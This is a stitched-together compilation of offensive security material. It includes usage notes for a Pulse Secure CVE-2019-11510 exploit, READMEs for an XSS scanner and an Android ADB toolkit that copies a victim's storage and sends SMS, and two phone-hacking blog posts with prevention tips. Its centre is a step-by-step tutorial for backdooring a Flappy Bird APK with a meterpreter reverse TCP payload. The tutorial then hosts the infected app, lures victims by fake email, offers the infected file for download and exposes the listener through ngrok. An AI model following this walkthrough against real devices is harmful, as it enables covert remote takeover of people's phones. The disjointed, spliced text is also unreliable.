Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)

python usage:

python CVE-2019-11510.py https://x.x.x.x

https://hackerone.com/reports/591295

https://github.com/projectzeroindia/CVE-2019-11510

Powerfull XSS Scanning and Parameter analysis tool&gem

Key features

  • Pattern matching based XSS scanning
  • Detect alert confirm prompt event on headless browser (with Selenium)
  • Testing request/response for XSS protection bypass and reflected params
    • Reflected Params
    • Filtered test event handler HTML tag Special Char Useful code
  • Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test…)
  • Dynamic/Static Analysis
    • Find SQL Error pattern
    • Analysis Security headers(CSP HSTS X-frame-optionsXSS-protection etc.. )
    • Analysis Other headers..(Server version, Content-Type, etc…)
  • Scanning from Raw file(Burp suite, ZAP Request)
  • XSpear running on ruby code(with Gem library)
  • Show table base cli-report and filtered ruletesting raw query(url)
  • Testing at selected parameters
  • Support output format cli json
    • cli: summary, filtered rule(params), Raw Query
  • Support Verbose level (quit / nomal / raw data)
  • Support custom callback code to any test various attack vectors

Installation

Install it yourself as:

$ gem install XSpear

Or install it yourself as (local file):

$ gem install XSpear-{version}.gem

Add this line to your application’s Gemfile:

gem 'XSpear'

And then execute:

$ bundle

Dependency gems

colorize selenium-webdriver terminal-table
If you configured it to install automatically in the Gem library, but it behaves abnormally, install it with the following command.

$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table

Usage on cli

Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'

[ Options ]
    -u, --url=target_URL             [required] Target Url
    -d, --data=POST Body             [optional] POST Method Body data
        --headers=HEADERS            [optional] Add HTTP Headers
        --cookie=COOKIE              [optional] Add Cookie
        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
    -p, --param=PARAM                [optional] Test paramters
    -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                      + with XSS Hunter, ezXSS, HBXSS, etc...
                                      + e.g : -b https://hahwul.xss.ht
    -t, --threads=NUMBER             [optional] thread , default: 10
    -o, --output=FILENAME            [optional] Save JSON Result
    -v, --verbose=1~3                [optional] Show log depth
                                      + Default value: 2
                                      + v=1 : quite mode
                                      + v=2 : show scanning log
                                      + v=3 : show detail log(req/res)
    -h, --help                       Prints this help
        --version                    Show XSpear version
        --update                     Show how to update

Result types

  • (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
  • (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium
  • (L)OW: Low level issue
  • (M)EDIUM: medium level issue
  • (H)IGH: high level issue

Case by Case

Scanning XSS

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

json output(with silence mode)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1

detail log

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3

set thread

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

testing at selected parameters

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

https://github.com/hahwul/XSpear

ADB-Toolkit is a BASH Script with 28 options and an METASPLOIT Section which has 6 options which is made to do easy penetration testing in Android Device.

sunglasses

METASPLOIT SECTION :- This section consists of scripts which are related to metasploit payload and you can create an payload and install it and launch it without even touching the phone and you know the power of Metasploit.

Version 2 Changelog

Changelog V2

Added Metasploit Section

Added 7 more options :-
1. COPY ALL DEVICE STORAGE
2. COPY A SPECIFIED FILE OR FOLDER
3. PUT A FILE IN VICTIMS DEVICE 
4. LAUNCH AN APPLICATION
5. CHECK IS PHONE ROOTED OR NOT
6. HANG THE PHONE ( Rooted Phone )
7. SEND SMS FROM THE PHONE

Fixed the Remote connection not establishing
Make the script executable from any where in shell

Note

Before using this tool you must enable Usb-Debugging from the devloper settings from the Android setting and then you are good to go.

Installation

git clone https://github.com/ASHWIN990/ADB-Toolkit.git

cd ADB-Toolkit

sudo chmod +x install.sh

sudo ./install.sh "or" sudo bash install.sh

Usage

sudo ./ADB-Toolkit.sh 

or you can do

sudo bash ADB-Toolkit.sh

or you can also do

sudo adb-toolkit

https://github.com/ASHWIN990/ADB-Toolkit

We have to set a point, mobile applications are a HUGE market today. Many entrepreneurs left behind web-based experiences for building disruptive mobile solutions. The battle of smart-phones remains today between IOsand Android. Both have pros and cons, they are designed and configured with default security settings that maybe not the ideal for non-experienced people.

This writing demonstrates a practical and simple example on how to generate a Reverse TCP back-door on an existing APK file.

This is a pretty common “Social Engineering Attack”, and it’s focused on generating a reverse TCP connection, where the attacker easily can generate shell access to your Android phone in the time you are using the infected application and do some harmful stuff or access your private information without any concern.

And when a mean “Social Engineering Attacks” is because the way it propagates, I’ll explain in a bit how are the typical phases of this attacks.

This demo was created on a controller and local lab, but it can be done on WAN networks easily.

Social Engineering (in simple words)

In order to explain the concept very clearly, we can split the term into two elements, where Social can set up as personal and professional livesEngineering refers to performing tasks by following certain steps to achieving targets. That combined.

Social Engineering is a term that describes nontechnical intrusion that relies heavily on human interaction by tricking other people to break normal security procedures.

It’s pretty simple, really. It’s all about mocking or tricking people to use or download a Malware and take advantage of it for malicious purposes.

Social Engineering Phases

The attack can be summarized in something like this:

  1. Research: tries to gather information about the target, collected from various resources (dumpster living, website, docs, interactions).
  2. Hook: makes the initial move by trying to start a conversation with the selected target after the completion of the research phase.
  3. Play: make the relationship stronger and continue the dialog to exploit the relationship and get the desired information.
  4. Exit: walks out of the attack scene of stops the communication with the target without creating a scene or doing any suspicious.

The working lab

A virtualized Kali Linux 2018.4 64 bits on Oracle Virtualbox.

Samsung Galaxy S6 with Android 4.4 Kitkat with some regular security configurations.

Both machines were connected on the same LAN Network.

Tools

The key tool for this workshop is the FatRat Exploitation tool, this program is written in Python, can easily generate backdoors on any existing Android application or almost any other device available with known payloads from the Metasploit Framework (and other payloads as well). This tool can perform a lot of other things, you can check the tool’s GitHub page here.

The installation process is quite simple, just keep in mind that can take some time because the dependencies installed.

Important: upgrade and update your Kali repositories before installing it, this can save you time.

Great, let’s install FatRat:

  1. Clone the repository from GitHub:
  2. git clone https://github.com/Screetsec/TheFatRat.git
  3. Inside the cloned repository, you will change the permissions on the setup.sh file for making it an executable file
  4. cd TheFatRatchmod +x setup.sh && ./setup.sh
  5. Follow the instructions

On the other side, we have the Metasploit Framework, this is an Open Source penetration tool used for developing and executing exploit code against remote target machines. Can be used to test vulnerabilities of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.

This amazing tool is already installed on the Kali Linux OS.

Let’s pause a bit.

At this moment (if this your first time hearing about Metasploit Framework) I’ll need to go deeper on this explanation, because, there are some key terms that may be a little bit confusing for you. I previously said that this tool is used to test vulnerabilities, right? A vulnerability is a weakness that can compromise the security of any system.

This vulnerability is exploited by using an exploit, this exploit refers to software code which allows an attacker to take advantage of a vulnerability.

And finally, when the vulnerability is exploited, the payload acts, this means, we run some code on the target system for enabling the exploitation to persist on time

With all that said. Let’s work.

Hands-on

In this example, I downloaded the Flappy Bird APK from here

This is the authentic APK game.

I personally renamed the download name to a simple flappybird.apk file and move it from the downloads directory to a custom folder named backdooring-android (this is optional)

Using FatRat

When I was installing FatRat on my Kali, the installer asked if I want to set the fatrat command globally, I said yes, this maybe can differ from your process

  1. By typing fatrat the system will evaluate and configure the necessary and available services
  2. Type 5, for Backdooring Original apk [Instagram, Line,etc]
  3. Set up the Local Host (LHOST) and Local Port (LPORT). This will represent the Host machine IP address (Kali) and any unused port for hearing back the TCP session handshake (I’ll explain this later)
  4. Now, we have to type the location path of the flappybird.apk, in my case is on /root/backdooring-android/flappybird.apk
  5. Setting up the payload (Metasploit term) for the reverse TCP. Select the option 3: android/meterpreter/reverse_tcp
  6. Select 1: Use Backdoor-apk 0.2.2 this is the tool for creating the infected APK

And that’s it. Meanwhile, FatRat will decompile the original APK and after some internal process will generate a new infected APK with the default name of app_backdoor.apk

After this, we set the generate the listener to no, we are going to generate it manually using Metasploit Framework

Creating the listener manually

The second part of this attack consists of setting the Host Machine (Kali) as a listener on the bidirectional TCP connection, that’s the main purpose of Reverse TCP shell attack through Social Engineering. The attack will have shell access to the Android machine without the user notice.

Let’s start by starting the msfconsole command

> msfconsole

After this, we set the multi/handler exploit like this

> use multi/handler

Later, setting the payload (the same on the FatRat process)

> set PAYLOAD android/meterpreter/reverse_tcp> set LHOST [the same as your Kali IP]> set LPORT [The same as FatRat process]

> exploit (running)

Checking the Apache service status (it’s already installed)

systemctl status apache2

Starting the service

systemctl start apache2

Placing the infected backdoor (renamed-or-not) for the victims

/var/www/html/ directory

Concluding

In this LAN network environment, the attacker needs to expose this new infected APK on the Apache Server to the victim, by sending a fake email with the link or any other way for tricking the people to download the new “ FlappyBird.apk” on their Android device.

Once the victim downloads the application and opens it, a new session on the listener will be created successfully, using the meterpreter (payload) shell.

The attacker has now the complete access to target custom attacks or performs some privilege escalation from the CLI.

You can list the sessions, like:

And you also can select and interact with an active session using the -i flag

> sessions -i 1

You can download my infected FlappyBird.apk file here

I’m not pretty sure if by setting your Kali machine with a static IP address just like the one I used to, can make this Malware works correctly. But, if it’s the case, my working IP address was a class C IP address 192.168.2.120and the 4444 port.

From LAN to WAN

A simple way to scaling a local IP address is using a simple tunneling tool called ngRok. This tool converts a simple 127.0.0.1 to something accessible to all public.

Check the docs for installation steps and auth token setup.

After that, you can set the ngrok command for TCP connections, like:

ngrok tcp 1234 for TCP protocol on the 1234 protocol

The whole process is the same, but you will need to replace the LHOST(Web interface from ngrok) and LPORT (the port from the ngrok TCP connection) to the elements that ngrok provided to you.

Tips for preventing

  1. Keep your Android device up to date (patches and OS version)
  2. NEVER download any .apk from non-trusted sources
  3. Always check the URL for intentional misspelled domain names
  4. Educate yourself

In the previous blogpost we talked about how your phone can get hacked via a local attack i.e. when the phone is in the attacker’s hand. In this blogpost we will see how your phone can get hacked remotely, meaning the attacker accesses it from distance.

As we already mentioned, “hacking” a phone means to access the content of your phone. That includes seeing what’s happening on the level of your screen, your camera, listening to your microphone,… as well as having control of the phone as well. Taking control of the phone means keeping control and having a constant access to it.

Remote attacks

To hack a phone remotely, you first need to understand what a numerical weapon is.

Exploits

We have what we call exploits, which are bugs that can be converted into something that allows the attacker to launch an app. For example, let’s consider there’s a system that has a bug, e.g. I know your phone will bug if I send you the message “1,2,3”. I’ll add my program following this “1,2,3” message which will be launched once the phone bugs. You’ll receive the message, your phone will read the message “1,2,3” and will bug, and then will launch the program that I sent via this sms. Here’s an example of this type of exploit.

Exploits can be local or remote. They always come from a bug. The bug allows you to send a command, and sometimes an entire program. In some cases the hacker can decide to keep a “persistant” access by installing a spy program on the device after having performed the attack. From here the attacker takes control of the phone.

There are two types of exploits:

1) Exploits that are known publicly. After the exploit is made known to the authors of the affected software, the security vulnerability is fixed and the exploit becomes unusable. So in order to protect yourself from publicly known exploits, you need to update your phone appropriately.

2) “Zero days”: which are exploits that aren’t made public, meaning people aren’t aware of these security vulnerabilities, except from the ones that found them. A zero day is a security flaw that has not yet been patched (i.e. “fixed”) by the vendor and can be exploited and turned into a powerful weapon. So when you have a zero day, you can basically hack all the range of devices which this bug allows you to exploit. Why aren’t these bugs published directly? Because the entity who has found the exploit has a particular interest in not making it public in order to hack; whether it’s criminals, governments,… Indeed if they publish the exploit, they won’t be able to hack anymore. Zero days can be found on the black market.

Finding exploits is a job, there are competitions for this. They can be sold at a very high price on the market, e.g. remote exploits for iPhone can be sold for millions. According to this article, “Apple now offers up to $1 million to security researchers who discover iOS vulnerabilities and report them, but these bugs are often way more valuable to sell on the black market”.

The more global the exploit is, the more expensive you’ll be able to sell it.

Then, there are also backdoors: you can see a “backdoor” as a hidden door, something the attacker voluntarily implemented inside the app so that they can connect to it. It’s essentially introducing a bug. For example, you modify iOS so that it bugs in a specific way. When you introduce a backdoor, it basically becomes your own zero day. If done well, it is very difficult for anyone to notice that there is one implemented.

It is extremely complicated to protect yourself from zero days, however you can protect yourself from public exploits, as they have been corrected by updates. But bear in mind that this still means you are vulnerable, in that you need to make sure your phone is updated appropriately. You cannot always count on your provider to ensure your security with updates. For example, take the Android market, where close to 90% of Android makers don’t provide updates, meaning a lot of phones become obsolete quickly, as they provide the updates for a duration of 6 months. Following this time, they can’t promise you security anymore (some fascinating sources on Android security: herehere, and here). If you want security you need to buy again. Most of Android devices’ exploits are publicly available. That means I can go on a website, download the exploits and hack more than half of Androids!

If you want to make sure you get the updates it’d be recommended to either buy iPhone or Google (and the security you get from them is only for a set period of time until they don’t provide updates anymore). If you really want to optimise security with a smartphone, go for an iPhone and renew the phone every two years (iPhone is better than Android Google in terms of privacy). It won’t protect you from zero days, but you’ll still considerably increase your security.

What kind of attacks?

Non-targeted attacks: They have a global target and attack the ones who have security flaws and then use these to access a very large amount of devices. They either exploit a weakness in software or in an organization’s defenses. Examples include the recent Android-WhatsApp scandal, where hackers exploited an Android vulnerability and injected spy softwares on to phones via the Whatsapp voice calling function, giving them full access to the devices remotely, allowing them to read messages, see contacts and activate the camera. The spy would be installed even if the call was not picked up!

Targeted attacks: These are attacks on a specific target, to achieve a specific objective. For example, it is the case of Pegasus, a spyware that can be installed on devices running certain versions of iOS. Pegasus exploited some iOS security vulnerabilities in order to take control of the devices of a specific group of activists. The software can basically do anything that users can do, including read text messages, turn on the camera and microphone, add and remove files, and manipulate data. If interested, here’s an article on it.

Targeted attacks require intelligent planning, which also means effort, time and money, in which case the attacker has determined that the “reward” is worth the effort. It can involve months of observation in order to collect maximum info and then design the attack.

Some of these attacks can even be physical, e.g. by using voltmeter lasers (devices that measure the voltage in cables) that give the measurement from distance and recover passwords from the keyboard’s cable. I can do it from the opposite building of your flat. By measuring the voltage in your cable, the voltmeter will determine which button was pressed. I can also film what happens on your keyboard from the opposite building, in which case I just need to find a good angle.

I could also attack the local network. I can hack your Wifi when I’m nearby, or your router from distance. Routers are not updated; 83% of them are vulnerable, and once I take control of the router this allows me to access your devices from your local network. Here’s an interesting paper on the security of routers.

There are a lot of ways to hack a smartphone — it depends on which numerical weapon you have. Each weapon has particular characteristics. Some will allow you to hack from far away, others will allow you to hack from very close. Hacking is about being ingenious enough to combine the different tools at your disposal in order to create an effective attack.

You can protect yourself from non-targeted attacks by updating your devices when fixes are available. However protecting yourself from a targeted attack is more complicated. If the attacker is high level, depending on how extreme his actions are, truth is he will eventually get access to the device. Nevertheless you can still take appropriate measure to increase your security, as we have also seen in our previous blogpost.

The introduction of the smartphone to the world has been an incredible gift for hackers. The gathering of info on this device, the fact that it’s always with you, and the simplicity of hacking it makes it a goldmine.

Author: @louismetz

How can I hack your phone? And what can you do to protect yourself from an attack?

First, let’s define the terms: what does “hacking” a phone mean? Put simply, it means to access the content of your phone i.e. the material and the info that’s inside. That includes seeing what’s happening on the level of your screen, your camera , listening to your microphone,…

An attack always comes down to the same thing: it is about accessing the content to the phone. And then, depending on the attacker’s intent, to take control of the phone as well. Taking control of the phone means keeping control and having a constant access to the phone (meaning it’s more than just reading the info).


1) How can I hack your phone?
2) What can I install on your phone to keep control of it?
3) What you can do to prevent your phone from being hacked…


How can I hack your phone?

Let’s differentiate two types of “attacks”: Local Attacks (I hack your phone with your phone in my hand) and Remote Attacks (I hack your phone from distance).

In this blogpost, we will talk about local attacks. Stay tuned for next week’s blogpost where we’ll approach remote attacks.

Local attack : “If I can touch your device, it’s mine”.

A local attack on your phone means I access it via physical contact. I can either just connect to your phone, read what’s in there and then leave without touching anything inside. In that case, I just took the info and that’s it. I can also go for a more extreme attack, where I install a “spy” (an app) and take control of the device. That essentially means that at any given point after I hack the phone, I can always reconnect and see what you’re up to.

Practically speaking, how can I hack your phone via a local attack?

  1. Breaking your pin code
  2. Accessing your phone for 5 min

1) Breaking your 4-digit pin code

One of the first things I’ll do to attack your phone is looking out for your 4-digit pin, since it’s something that you’ll always end up using, and therefore me seeing you in action is just a question of time. Even though it’s becoming more challenging with fingerprint and face ID access, there will always be moments where you will use this pin or pattern (depending on whether you have an Iphone or Android), which are essentially the same: a simple combination of four numbers. Face ID or biometric access can fail for whatever reason in the moment, and you’d usually resort to your pincode or pattern. I just need to be patient. I can also provoke you into having to enter your pin by blocking your phone. All I have to do is “fail” to unlock it multiple times, until it gets blocked and it asks you for your pin. At this moment you will need to manually enter your password. And I shall be watching.

You might think it isn’t this easy to get physical access to someone’s phone. Well, isn’t it, though? “Hey, can I use your phone to check something?” “May I use your phone to send a message to my girlfriend? My phone ran out of battery.” “May I put another song on?”. To which you may most probably reply “Sure, go for it!”.

In one of our previous blogposts we mentioned how easy it is for a hacker to access someone else’s phone physically (last paragraph). And all this is even considering everyone has a pincode on. How many of your friends actually have no password, no barriers whatsoever that protects the access to the content of their phone?

The moment I have your pin, I have access to everything. I can download anything and that’s it: I have now full control over your phone.

Now, let’s say I don’t have your pin, but still have physical access to your phone. What can I do to hack it? I can still find another way…

2) Accessing your phone for 5 min

5 min, that’s all I need. Whether it’s while you’re having a shower, or working out at the gym.

Let’s consider for whichever reason that I haven’t been able to break your pin code. In that case, here’s what I’ll do: once I have your phone in my hand, I’ll turn it off and turn it back on while downloading an app at the startup. This will give me a kind of developer mode where I have access to the phone as if it was a USB key. Once it’s on, what I’m looking for is the decrypting key, which is protected by your pin. If your pin is 4-digits long, that basically means the decrypting key I want access to is protected by a 4-digit code. And this is very easily breakable. In fact it could be done in about 30secs!

Concretely speaking, what do I do? I plug the phone to my computer, I start it in DFU (Device Firmware Upgrade) mode, I charge an app inside, which gives me access to your phone’s memory just like if it was a USB. I now have your files, but they’re encrypted. They’re encrypted with a key. A key protected by a 4-digit code.

From 0000 to 9999 : these are all the possible combinations, and for a computer this only takes a few seconds to break.

What I’ll do here is break this pin by testing all the possible combinations with a brute-force app (easily available on the internet). Once I’ve found the correct combination, job done! I simply unlock the phone, and I can read your files. Which means I have access to all your passwords, email, WhatsApp, Facebook, etc.

It’s a common technique used by hackers, as well as the police. In fact, some hackers steal phones in order to resell them by unlocking them. They gain physical access to it, plug it to their computer using an app to read it just like a USB mode, then unlock the phone to resell it.

Hence the importance for a solid pin code, as this is what encrypts your device. Instead of a 4-digit code, use a long passcode.


What can I install on your phone to keep control of it?

My goal here will be to download “spy” apps in order to keep control of your phone even after it’s no longer in my hands and after you get it back. What types of apps?

There are illegal spy apps I can install: I can have an app pre-charged on a website, enter the website address, download the app directly and that’s it.

But I can also install spy apps that are actually legal! Take the example of mspy, an “Ultimate monitoring software for parental control”. Installing this app enables me to snoop on your WhatsApp, Snapchat, Facebook, text messages, calls, location, etc. I can pretty much monitor and control anything I want. It’s that easy!

I don’t have to go through the App Store to download an app, which means I don’t even need to know your Apple ID.

Another technique is adding a root certificate. A root certificate basically communicates to your phone that you are connected to a secure internet website. That’s when that little padlock appears (you can probably see it at the top of your screen right now). Some authorities determine which secure connections are valid and which aren’t, which means that when the padlock appears, that secure connection has been validated by one certificate authority. They’re automatically pre-charged in your phone. However, I can add one myself on your phone: I just need your access code and then I can intercept all your secure communications and read everything you’re doing. (Yes, HTTPS and the little padlock appearing on your search box doesn’t necessarily mean your connection is safe!).

Once I’ve installed a spy on your phone, it is very difficult for you to notice it: you either need to apply forensic techniques (techniques used by the police) to analyse what’s on your phone, or you need to intercept the connections of your phone. Either way, you need to be an expert to be able to do this.

That is why it is important to use preventive measures to avoid an attack.


What YOU can do to prevent your phone from being hacked…

Measures that you can take to avoid a local attack:

1) Use a longer passcode with an alphanumeric keyboard and biometric accessinstead of a 4-digit pin code or a pattern. Breaking a long alphanumerical passphrase by observing you typing it or even with a brute force app is extremely complicated. (To custom a longer numeric code or alphanumeric code, go to Settings — Touch ID & Passcode — Change Passcode). You can already considerably increase your protection by using a long passcode together with biometric access.

2) Enable the parental control access: Block your settings with the enablement of parental control which gives you another password. Indeed the parental control limits an attacker’s access to some configurations as it means they have to enter a second password on top of the passcode. Even if they manage to unlock your phone, they won’t be able to install something as they’ll need to go to your settings to do that, and with the parental control it’ll ask them for another code which they don’t have. (Please note: the parental control is not enabled by default, you need to activate it. To do so, go to Settings and tap Screen Time. You can then enter a passcode and configure Content & Privacy Restrictions as you see fit).

Parental control access is an added layer of protection only useful in “live”, that is whenever I have physical access to your phone in the moment, as it will prevent me from changing the settings. However it is not useful if I take your phone and plug it to my computer in USB mode (as mentioned above), as I’ll have access to the entire system in that case, which will allow me to do more things, including having access to the passwords.

Nonetheless, by using a long passcode and enabling parental control access, you are already being far more secure and protected.

3) Don’t make it easy for anyone to touch your phone. You shouldn’t easily give your phone to people. Your phone stores a lot of confidential information that you do not want to get out. That includes your passwords, email, bank account logins, social media access, etc. Treat it accordingly. Similarly, avoid leaving your phone in places where someone could easily get hold of it.

4) Not much else you can do. Except from not having a smartphone (which can be an option!)

The real challenge of a local attack, since it’s “physical”, is that the attacker needs to touch it. He must be capable to access the device physically, which isn’t always easy. However, technically speaking, it is easier than a remote attack.

Bad Authentication data.